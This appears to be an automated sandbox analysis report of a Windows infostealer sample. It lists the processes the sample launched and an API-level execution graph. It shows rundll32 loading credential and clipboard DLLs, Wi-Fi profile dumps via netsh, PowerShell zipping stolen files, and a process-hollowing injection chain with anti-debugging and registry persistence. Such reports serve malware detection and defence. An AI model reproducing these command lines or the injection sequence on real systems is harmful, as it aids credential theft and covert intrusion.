                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                Start time:02:20:09
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                                                                                                                Imagebase:0x7ff7e39d0000
                                                                                                                                                                                                File size:71'680 bytes
                                                                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                Start time:02:20:11
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:netsh wlan show profiles
                                                                                                                                                                                                Imagebase:0x7ff703ce0000
                                                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                Start time:02:20:11
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:netsh wlan show profiles
                                                                                                                                                                                                Imagebase:0x7ff703ce0000
                                                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                Start time:02:20:11
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff68cce0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                Start time:02:20:11
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff68cce0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                Start time:02:20:14
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                                                                                                                                                                                                Imagebase:0x5e0000
                                                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                Start time:02:20:14
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                                                                                                                                                                                                Imagebase:0x5e0000
                                                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                Start time:02:20:18
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                                                Imagebase:0x7ff6eb350000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                Start time:02:20:18
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff68cce0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                Start time:02:20:19
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                                                Imagebase:0x7ff6eb350000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                Start time:02:20:19
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff68cce0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:41.8%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:51.8%
                                                                                                                                                                                                  Total number of Nodes:483
                                                                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                                                                  execution_graph 1366 7ff7cdc4338c 1369 7ff7cdc42048 GetModuleFileNameW 1366->1369 1370 7ff7cdc420c9 1369->1370 1376 7ff7cdc420c4 1369->1376 1371 7ff7cdc42107 1370->1371 1372 7ff7cdc4211d 1370->1372 1373 7ff7cdc4213b 1371->1373 1374 7ff7cdc42111 1371->1374 1412 7ff7cdc41f88 ExpandEnvironmentStringsW 1372->1412 1413 7ff7cdc41fc8 ExpandEnvironmentStringsW 1373->1413 1374->1376 1414 7ff7cdc42008 ExpandEnvironmentStringsW 1374->1414 1377 7ff7cdc42132 1377->1376 1380 7ff7cdc4218d CreateProcessW 1377->1380 1380->1376 1381 7ff7cdc421e8 CreateFileW 1380->1381 1381->1376 1382 7ff7cdc4222f GetFileSize 1381->1382 1383 7ff7cdc42257 CloseHandle 1382->1383 1384 7ff7cdc4224d 1382->1384 1383->1376 1384->1383 1385 7ff7cdc42267 VirtualAlloc 1384->1385 1386 7ff7cdc422a1 ReadFile 1385->1386 1387 7ff7cdc42291 CloseHandle 1385->1387 1388 7ff7cdc422ce VirtualFree CloseHandle 1386->1388 1389 7ff7cdc422f1 CloseHandle GetThreadContext 1386->1389 1387->1376 1388->1376 1390 7ff7cdc42359 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 1389->1390 1391 7ff7cdc42341 VirtualFree 1389->1391 1392 7ff7cdc423f8 VirtualAllocEx 1390->1392 1393 7ff7cdc423e0 VirtualFree 1390->1393 1391->1376 1394 7ff7cdc4247b WriteProcessMemory 1392->1394 1395 7ff7cdc42463 VirtualFree 1392->1395 1393->1376 1396 7ff7cdc424b1 VirtualFree 1394->1396 1399 7ff7cdc424c9 1394->1399 1395->1376 1396->1376 1397 7ff7cdc424ff WriteProcessMemory 1398 7ff7cdc4258a VirtualFree 1397->1398 1397->1399 1398->1376 1399->1397 1402 7ff7cdc425a7 1399->1402 1400 7ff7cdc42619 RtlCompareMemory 1400->1402 1408 7ff7cdc4266c 1400->1408 1401 7ff7cdc42898 WriteProcessMemory SetThreadContext 1403 7ff7cdc4291e VirtualFree 1401->1403 1404 7ff7cdc42933 ResumeThread 1401->1404 1402->1400 1402->1401 1403->1376 1405 7ff7cdc4295a VirtualFree 1404->1405 1406 7ff7cdc42945 VirtualFree 1404->1406 1405->1376 1406->1376 1407 7ff7cdc42893 1407->1401 1408->1407 1409 7ff7cdc4279c ReadProcessMemory WriteProcessMemory 1408->1409 1410 7ff7cdc42889 1409->1410 1411 7ff7cdc42871 VirtualFree 1409->1411 1410->1408 1411->1376 1412->1377 1413->1377 1414->1377 1415 7ff7cdc433ac 1416 7ff7cdc42048 37 API calls 1415->1416 1417 7ff7cdc433bf 1416->1417 1421 7ff7cdc431ec 1422 7ff7cdc431f5 1421->1422 1423 7ff7cdc4320e 1422->1423 1426 7ff7cdc4306c 1422->1426 1431 7ff7cdc42e6c CreateMutexA 1426->1431 1429 7ff7cdc43087 Sleep CreateThread WaitForSingleObject 1430 7ff7cdc430cc Sleep 1429->1430 1430->1422 1432 7ff7cdc42e98 ReleaseMutex CloseHandle 1431->1432 1433 7ff7cdc42eb5 GetLastError 1431->1433 1434 7ff7cdc42ef7 1432->1434 1435 7ff7cdc42ec2 ReleaseMutex CloseHandle 1433->1435 1436 7ff7cdc42edf ReleaseMutex CloseHandle 1433->1436 1434->1429 1434->1430 1435->1434 1436->1434 1472 7ff7cdc42f0c CreateMutexA 1473 7ff7cdc42f4e GetLastError 1472->1473 1474 7ff7cdc42f31 ReleaseMutex CloseHandle 1472->1474 1475 7ff7cdc42f78 ReleaseMutex CloseHandle 1473->1475 1476 7ff7cdc42f5b ReleaseMutex CloseHandle 1473->1476 1477 7ff7cdc42f90 1474->1477 1475->1477 1476->1477 840 7ff7cdc4345c 901 7ff7cdc410a0 840->901 845 7ff7cdc4347c 1135 7ff7cdc44264 GetCurrentProcess OpenProcessToken 845->1135 846 7ff7cdc43474 ExitProcess 850 7ff7cdc43497 851 7ff7cdc434ac 850->851 852 7ff7cdc434fb 850->852 853 7ff7cdc443a4 3 API calls 851->853 857 7ff7cdc43510 852->857 860 7ff7cdc4354c 852->860 854 7ff7cdc434b8 853->854 855 7ff7cdc434d2 ExitProcess 854->855 856 7ff7cdc434bf 854->856 859 7ff7cdc443a4 3 API calls 856->859 858 7ff7cdc443a4 3 API calls 857->858 861 7ff7cdc4351c 858->861 862 7ff7cdc434cb 859->862 866 7ff7cdc435a2 860->866 867 7ff7cdc43561 860->867 863 7ff7cdc4352b 861->863 864 7ff7cdc43523 ExitProcess 861->864 862->855 865 7ff7cdc434da 862->865 868 7ff7cdc4327c 20 API calls 863->868 1169 7ff7cdc432ec 865->1169 1159 7ff7cdc43a74 866->1159 1150 7ff7cdc443a4 CreateMutexA 867->1150 872 7ff7cdc43530 868->872 876 7ff7cdc43537 Sleep 872->876 877 7ff7cdc43544 ExitProcess 872->877 874 7ff7cdc434df 879 7ff7cdc434e6 Sleep 874->879 880 7ff7cdc434f3 ExitProcess 874->880 876->872 879->874 881 7ff7cdc4357c 1154 7ff7cdc4327c 881->1154 882 7ff7cdc43574 ExitProcess 885 7ff7cdc43581 888 7ff7cdc43588 Sleep 885->888 889 7ff7cdc43595 ExitProcess 885->889 886 7ff7cdc435ba 890 7ff7cdc443a4 3 API calls 886->890 887 7ff7cdc4360e 7 API calls 888->885 891 7ff7cdc435c6 890->891 892 7ff7cdc435cd 891->892 893 7ff7cdc435e0 ExitProcess 891->893 894 7ff7cdc443a4 3 API calls 892->894 895 7ff7cdc435d9 894->895 895->893 896 7ff7cdc435e8 895->896 897 7ff7cdc432ec 47 API calls 896->897 898 7ff7cdc435ed 897->898 899 7ff7cdc43601 ExitProcess 898->899 900 7ff7cdc435f4 Sleep 898->900 900->898 1178 7ff7cdc41000 LoadLibraryA GetProcAddress 901->1178 903 7ff7cdc4113a 1179 7ff7cdc41000 LoadLibraryA GetProcAddress 903->1179 905 7ff7cdc41154 1180 7ff7cdc41050 LoadLibraryA GetProcAddress 905->1180 907 7ff7cdc4116e 1181 7ff7cdc41050 LoadLibraryA GetProcAddress 907->1181 909 7ff7cdc41188 1182 7ff7cdc41050 LoadLibraryA GetProcAddress 909->1182 911 7ff7cdc411a2 1183 7ff7cdc41050 LoadLibraryA GetProcAddress 911->1183 913 7ff7cdc411bc 1184 7ff7cdc41050 LoadLibraryA GetProcAddress 913->1184 915 7ff7cdc411d6 1185 7ff7cdc41050 LoadLibraryA GetProcAddress 915->1185 917 7ff7cdc411f0 1186 7ff7cdc41050 LoadLibraryA GetProcAddress 917->1186 919 7ff7cdc4120a 1187 7ff7cdc41050 LoadLibraryA GetProcAddress 919->1187 921 7ff7cdc41224 1188 7ff7cdc41050 LoadLibraryA GetProcAddress 921->1188 923 7ff7cdc4123e 1189 7ff7cdc41000 LoadLibraryA GetProcAddress 923->1189 925 7ff7cdc41258 1190 7ff7cdc41000 LoadLibraryA GetProcAddress 925->1190 927 7ff7cdc41272 1191 7ff7cdc41000 LoadLibraryA GetProcAddress 927->1191 929 7ff7cdc4128c 1192 7ff7cdc41000 LoadLibraryA GetProcAddress 929->1192 931 7ff7cdc412a6 1193 7ff7cdc41050 LoadLibraryA GetProcAddress 931->1193 933 7ff7cdc412c0 1194 7ff7cdc41050 LoadLibraryA GetProcAddress 933->1194 935 7ff7cdc412da 1195 7ff7cdc41050 LoadLibraryA GetProcAddress 935->1195 937 7ff7cdc412f4 1196 7ff7cdc41050 LoadLibraryA GetProcAddress 937->1196 939 7ff7cdc4130e 1197 7ff7cdc41050 LoadLibraryA GetProcAddress 939->1197 941 7ff7cdc41328 1198 7ff7cdc41050 LoadLibraryA GetProcAddress 941->1198 943 7ff7cdc41342 1199 7ff7cdc41050 LoadLibraryA GetProcAddress 943->1199 945 7ff7cdc4135c 1200 7ff7cdc41050 LoadLibraryA GetProcAddress 945->1200 947 7ff7cdc41376 1201 7ff7cdc41050 LoadLibraryA GetProcAddress 947->1201 949 7ff7cdc41390 1202 7ff7cdc41050 LoadLibraryA GetProcAddress 949->1202 951 7ff7cdc413aa 1203 7ff7cdc41050 LoadLibraryA GetProcAddress 951->1203 953 7ff7cdc413c4 1204 7ff7cdc41050 LoadLibraryA GetProcAddress 953->1204 955 7ff7cdc413de 1205 7ff7cdc41050 LoadLibraryA GetProcAddress 955->1205 957 7ff7cdc413f8 1206 7ff7cdc41050 LoadLibraryA GetProcAddress 957->1206 959 7ff7cdc41412 1207 7ff7cdc41050 LoadLibraryA GetProcAddress 959->1207 961 7ff7cdc4142c 1208 7ff7cdc41050 LoadLibraryA GetProcAddress 961->1208 963 7ff7cdc41446 1209 7ff7cdc41050 LoadLibraryA GetProcAddress 963->1209 965 7ff7cdc41460 1210 7ff7cdc41050 LoadLibraryA GetProcAddress 965->1210 967 7ff7cdc4147a 1211 7ff7cdc41050 LoadLibraryA GetProcAddress 967->1211 969 7ff7cdc41494 1212 7ff7cdc41050 LoadLibraryA GetProcAddress 969->1212 971 7ff7cdc414ae 1213 7ff7cdc41050 LoadLibraryA GetProcAddress 971->1213 973 7ff7cdc414c8 1214 7ff7cdc41050 LoadLibraryA GetProcAddress 973->1214 975 7ff7cdc414e2 1215 7ff7cdc41050 LoadLibraryA GetProcAddress 975->1215 977 7ff7cdc414fc 1216 7ff7cdc41050 LoadLibraryA GetProcAddress 977->1216 979 7ff7cdc41516 1217 7ff7cdc41050 LoadLibraryA GetProcAddress 979->1217 981 7ff7cdc41530 1218 7ff7cdc41050 LoadLibraryA GetProcAddress 981->1218 983 7ff7cdc4154a 1219 7ff7cdc41050 LoadLibraryA GetProcAddress 983->1219 985 7ff7cdc41564 1220 7ff7cdc41050 LoadLibraryA GetProcAddress 985->1220 987 7ff7cdc4157e 1221 7ff7cdc41050 LoadLibraryA GetProcAddress 987->1221 989 7ff7cdc41598 1222 7ff7cdc41050 LoadLibraryA GetProcAddress 989->1222 991 7ff7cdc415b2 1223 7ff7cdc41050 LoadLibraryA GetProcAddress 991->1223 993 7ff7cdc415cc 1224 7ff7cdc41050 LoadLibraryA GetProcAddress 993->1224 995 7ff7cdc415e6 1225 7ff7cdc41050 LoadLibraryA GetProcAddress 995->1225 997 7ff7cdc41600 1226 7ff7cdc41050 LoadLibraryA GetProcAddress 997->1226 999 7ff7cdc4161a 1227 7ff7cdc41050 LoadLibraryA GetProcAddress 999->1227 1001 7ff7cdc41634 1228 7ff7cdc41050 LoadLibraryA GetProcAddress 1001->1228 1003 7ff7cdc4164e 1229 7ff7cdc41050 LoadLibraryA GetProcAddress 1003->1229 1005 7ff7cdc41668 1230 7ff7cdc41050 LoadLibraryA GetProcAddress 1005->1230 1007 7ff7cdc41682 1231 7ff7cdc41050 LoadLibraryA GetProcAddress 1007->1231 1009 7ff7cdc4169c 1232 7ff7cdc41050 LoadLibraryA GetProcAddress 1009->1232 1011 7ff7cdc416b6 1233 7ff7cdc41050 LoadLibraryA GetProcAddress 1011->1233 1013 7ff7cdc416d0 1234 7ff7cdc41050 LoadLibraryA GetProcAddress 1013->1234 1015 7ff7cdc416ea 1235 7ff7cdc41050 LoadLibraryA GetProcAddress 1015->1235 1017 7ff7cdc41704 1236 7ff7cdc41050 LoadLibraryA GetProcAddress 1017->1236 1019 7ff7cdc4171e 1237 7ff7cdc41050 LoadLibraryA GetProcAddress 1019->1237 1021 7ff7cdc41738 1238 7ff7cdc41050 LoadLibraryA GetProcAddress 1021->1238 1023 7ff7cdc41752 1239 7ff7cdc41050 LoadLibraryA GetProcAddress 1023->1239 1025 7ff7cdc4176c 1240 7ff7cdc41050 LoadLibraryA GetProcAddress 1025->1240 1027 7ff7cdc41786 1241 7ff7cdc41050 LoadLibraryA GetProcAddress 1027->1241 1029 7ff7cdc417a0 1242 7ff7cdc41050 LoadLibraryA GetProcAddress 1029->1242 1031 7ff7cdc417ba 1243 7ff7cdc41050 LoadLibraryA GetProcAddress 1031->1243 1033 7ff7cdc417d4 1244 7ff7cdc41050 LoadLibraryA GetProcAddress 1033->1244 1035 7ff7cdc417ee 1245 7ff7cdc41050 LoadLibraryA GetProcAddress 1035->1245 1037 7ff7cdc41808 1246 7ff7cdc41050 LoadLibraryA GetProcAddress 1037->1246 1039 7ff7cdc41822 1247 7ff7cdc41050 LoadLibraryA GetProcAddress 1039->1247 1041 7ff7cdc4183c 1248 7ff7cdc41050 LoadLibraryA GetProcAddress 1041->1248 1043 7ff7cdc41856 1249 7ff7cdc41050 LoadLibraryA GetProcAddress 1043->1249 1045 7ff7cdc41870 1250 7ff7cdc41050 LoadLibraryA GetProcAddress 1045->1250 1047 7ff7cdc4188a 1251 7ff7cdc41050 LoadLibraryA GetProcAddress 1047->1251 1049 7ff7cdc418a4 1252 7ff7cdc41050 LoadLibraryA GetProcAddress 1049->1252 1051 7ff7cdc418be 1253 7ff7cdc41050 LoadLibraryA GetProcAddress 1051->1253 1053 7ff7cdc418d8 1254 7ff7cdc41050 LoadLibraryA GetProcAddress 1053->1254 1055 7ff7cdc418f2 1255 7ff7cdc41050 LoadLibraryA GetProcAddress 1055->1255 1057 7ff7cdc4190c 1256 7ff7cdc41050 LoadLibraryA GetProcAddress 1057->1256 1059 7ff7cdc41926 1257 7ff7cdc41050 LoadLibraryA GetProcAddress 1059->1257 1061 7ff7cdc41940 1258 7ff7cdc41050 LoadLibraryA GetProcAddress 1061->1258 1063 7ff7cdc4195a 1259 7ff7cdc41050 LoadLibraryA GetProcAddress 1063->1259 1065 7ff7cdc41974 1260 7ff7cdc41050 LoadLibraryA GetProcAddress 1065->1260 1067 7ff7cdc4198e 1261 7ff7cdc41050 LoadLibraryA GetProcAddress 1067->1261 1069 7ff7cdc419a8 1262 7ff7cdc41050 LoadLibraryA GetProcAddress 1069->1262 1071 7ff7cdc419c2 1263 7ff7cdc41050 LoadLibraryA GetProcAddress 1071->1263 1073 7ff7cdc419dc 1264 7ff7cdc41050 LoadLibraryA GetProcAddress 1073->1264 1075 7ff7cdc419f6 1265 7ff7cdc41050 LoadLibraryA GetProcAddress 1075->1265 1077 7ff7cdc41a10 1266 7ff7cdc41050 LoadLibraryA GetProcAddress 1077->1266 1079 7ff7cdc41a2a 1267 7ff7cdc41050 LoadLibraryA GetProcAddress 1079->1267 1081 7ff7cdc41a44 1268 7ff7cdc41050 LoadLibraryA GetProcAddress 1081->1268 1083 7ff7cdc41a5e 1269 7ff7cdc41050 LoadLibraryA GetProcAddress 1083->1269 1085 7ff7cdc41a78 1270 7ff7cdc41050 LoadLibraryA GetProcAddress 1085->1270 1087 7ff7cdc41a92 1271 7ff7cdc41050 LoadLibraryA GetProcAddress 1087->1271 1089 7ff7cdc41aac 1272 7ff7cdc41050 LoadLibraryA GetProcAddress 1089->1272 1091 7ff7cdc41ac6 1273 7ff7cdc41050 LoadLibraryA GetProcAddress 1091->1273 1093 7ff7cdc41ae0 1274 7ff7cdc41050 LoadLibraryA GetProcAddress 1093->1274 1095 7ff7cdc41afa 1275 7ff7cdc41050 LoadLibraryA GetProcAddress 1095->1275 1097 7ff7cdc41b14 1276 7ff7cdc41050 LoadLibraryA GetProcAddress 1097->1276 1099 7ff7cdc41b2e 1277 7ff7cdc41000 LoadLibraryA GetProcAddress 1099->1277 1101 7ff7cdc41b48 1278 7ff7cdc41050 LoadLibraryA GetProcAddress 1101->1278 1103 7ff7cdc41b62 1279 7ff7cdc41050 LoadLibraryA GetProcAddress 1103->1279 1105 7ff7cdc41b7c 1280 7ff7cdc41050 LoadLibraryA GetProcAddress 1105->1280 1107 7ff7cdc41b96 1281 7ff7cdc41050 LoadLibraryA GetProcAddress 1107->1281 1109 7ff7cdc41bb0 1282 7ff7cdc41050 LoadLibraryA GetProcAddress 1109->1282 1111 7ff7cdc41bca 1283 7ff7cdc41050 LoadLibraryA GetProcAddress 1111->1283 1113 7ff7cdc41be4 1284 7ff7cdc41050 LoadLibraryA GetProcAddress 1113->1284 1115 7ff7cdc41bfe 1285 7ff7cdc41000 LoadLibraryA GetProcAddress 1115->1285 1117 7ff7cdc41c18 1286 7ff7cdc41000 LoadLibraryA GetProcAddress 1117->1286 1119 7ff7cdc41c32 1287 7ff7cdc41050 LoadLibraryA GetProcAddress 1119->1287 1121 7ff7cdc41c4c 1288 7ff7cdc41050 LoadLibraryA GetProcAddress 1121->1288 1123 7ff7cdc41c66 1289 7ff7cdc41050 LoadLibraryA GetProcAddress 1123->1289 1125 7ff7cdc41c80 1290 7ff7cdc41050 LoadLibraryA GetProcAddress 1125->1290 1127 7ff7cdc41c9a 1291 7ff7cdc41050 LoadLibraryA GetProcAddress 1127->1291 1129 7ff7cdc41cb4 1292 7ff7cdc41050 LoadLibraryA GetProcAddress 1129->1292 1131 7ff7cdc41cce 1132 7ff7cdc4321c IsDebuggerPresent 1131->1132 1133 7ff7cdc4322e GetCurrentProcess CheckRemoteDebuggerPresent 1132->1133 1134 7ff7cdc4322a 1132->1134 1133->1134 1134->845 1134->846 1136 7ff7cdc4428a GetTokenInformation 1135->1136 1137 7ff7cdc43481 1135->1137 1293 7ff7cdc43b54 VirtualAlloc 1136->1293 1146 7ff7cdc43ce4 GetModuleFileNameW 1137->1146 1139 7ff7cdc442bb GetTokenInformation 1140 7ff7cdc442e8 CloseHandle 1139->1140 1141 7ff7cdc44302 AdjustTokenPrivileges CloseHandle 1139->1141 1142 7ff7cdc43b24 VirtualFree 1140->1142 1294 7ff7cdc43b24 1141->1294 1143 7ff7cdc442fd 1142->1143 1143->1137 1147 7ff7cdc43dd2 wcsncpy 1146->1147 1148 7ff7cdc43d0f PathFindFileNameW wcslen 1146->1148 1149 7ff7cdc43d49 1147->1149 1148->1149 1149->850 1151 7ff7cdc443d0 GetLastError 1150->1151 1152 7ff7cdc4356d 1150->1152 1151->1152 1153 7ff7cdc443dd CloseHandle 1151->1153 1152->881 1152->882 1153->1152 1297 7ff7cdc438c4 1154->1297 1156 7ff7cdc4328c 1300 7ff7cdc444b4 CreateFileW 1156->1300 1160 7ff7cdc43744 3 API calls 1159->1160 1161 7ff7cdc43a9f 1160->1161 1162 7ff7cdc438c4 11 API calls 1161->1162 1163 7ff7cdc43aa9 GetModuleFileNameW DeleteFileW CopyFileW 1162->1163 1164 7ff7cdc435a7 1163->1164 1165 7ff7cdc43aeb SetFileAttributesW 1163->1165 1167 7ff7cdc433ec GetVersionExW 1164->1167 1317 7ff7cdc439b4 RegOpenKeyExW 1165->1317 1168 7ff7cdc4341d 1167->1168 1168->886 1168->887 1170 7ff7cdc438c4 11 API calls 1169->1170 1171 7ff7cdc432fd 1170->1171 1320 7ff7cdc446e4 CreateFileW 1171->1320 1173 7ff7cdc43357 CreateThread 1173->874 1174 7ff7cdc43315 1174->1173 1332 7ff7cdc440c4 1174->1332 1178->903 1179->905 1180->907 1181->909 1182->911 1183->913 1184->915 1185->917 1186->919 1187->921 1188->923 1189->925 1190->927 1191->929 1192->931 1193->933 1194->935 1195->937 1196->939 1197->941 1198->943 1199->945 1200->947 1201->949 1202->951 1203->953 1204->955 1205->957 1206->959 1207->961 1208->963 1209->965 1210->967 1211->969 1212->971 1213->973 1214->975 1215->977 1216->979 1217->981 1218->983 1219->985 1220->987 1221->989 1222->991 1223->993 1224->995 1225->997 1226->999 1227->1001 1228->1003 1229->1005 1230->1007 1231->1009 1232->1011 1233->1013 1234->1015 1235->1017 1236->1019 1237->1021 1238->1023 1239->1025 1240->1027 1241->1029 1242->1031 1243->1033 1244->1035 1245->1037 1246->1039 1247->1041 1248->1043 1249->1045 1250->1047 1251->1049 1252->1051 1253->1053 1254->1055 1255->1057 1256->1059 1257->1061 1258->1063 1259->1065 1260->1067 1261->1069 1262->1071 1263->1073 1264->1075 1265->1077 1266->1079 1267->1081 1268->1083 1269->1085 1270->1087 1271->1089 1272->1091 1273->1093 1274->1095 1275->1097 1276->1099 1277->1101 1278->1103 1279->1105 1280->1107 1281->1109 1282->1111 1283->1113 1284->1115 1285->1117 1286->1119 1287->1121 1288->1123 1289->1125 1290->1127 1291->1129 1292->1131 1293->1139 1295 7ff7cdc43b48 1294->1295 1296 7ff7cdc43b35 VirtualFree 1294->1296 1295->1137 1296->1295 1306 7ff7cdc43744 GetWindowsDirectoryW 1297->1306 1299 7ff7cdc438f3 8 API calls 1299->1156 1301 7ff7cdc4450a 1300->1301 1302 7ff7cdc4452b GetLastError 1300->1302 1311 7ff7cdc44404 GetFileSize 1301->1311 1304 7ff7cdc4329f CreateThread Sleep 1302->1304 1304->885 1307 7ff7cdc43798 GetVolumeInformationW 1306->1307 1308 7ff7cdc4378e 1306->1308 1309 7ff7cdc43814 1307->1309 1308->1307 1310 7ff7cdc4387e wsprintfW 1309->1310 1310->1299 1316 7ff7cdc43b54 VirtualAlloc 1311->1316 1313 7ff7cdc44430 1314 7ff7cdc44444 SetFilePointer ReadFile 1313->1314 1315 7ff7cdc4447a CloseHandle 1313->1315 1314->1315 1315->1304 1316->1313 1318 7ff7cdc439f9 RegSetValueExW RegCloseKey 1317->1318 1319 7ff7cdc439f5 1317->1319 1318->1319 1319->1164 1321 7ff7cdc4473e 1320->1321 1322 